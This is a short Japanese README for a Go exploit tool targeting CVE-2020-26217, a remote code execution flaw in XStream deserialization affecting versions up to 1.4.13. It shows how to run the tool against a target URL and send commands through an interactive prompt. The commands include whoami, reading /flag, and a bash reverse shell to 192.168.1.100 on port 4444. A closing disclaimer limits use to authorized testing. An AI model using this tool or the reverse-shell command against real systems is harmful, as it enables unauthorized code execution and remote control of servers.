
CVE-2020-26217 XStreamデシリアライゼーションのPoC
XStream リモートコード実行脆弱性悪用ツール。
CVE-2020-26217 は、XStream ライブラリにおける逆シリアル化の脆弱性であり、攻撃者は悪意のある XML データを構築することでリモートコード実行を引き起こす可能性があります。
影響を受けるバージョン:XStream <= 1.4.13
go run poc.go <目標URL>
# ツールの実行
go run poc.go http://target.com:8080/?data
# インタラクティブモードに入ったらコマンドを入力
cmd> whoami
cmd> cat /flag
cmd> bash -i >& /dev/tcp/192.168.1.100/4444 0>&1
cmd> exit
go build -o poc poc.go
本ツールはセキュリティ研究および許可されたテスト専用であり、不正使用はご遠慮ください。使用者は関連する法的責任を自ら負うものとします。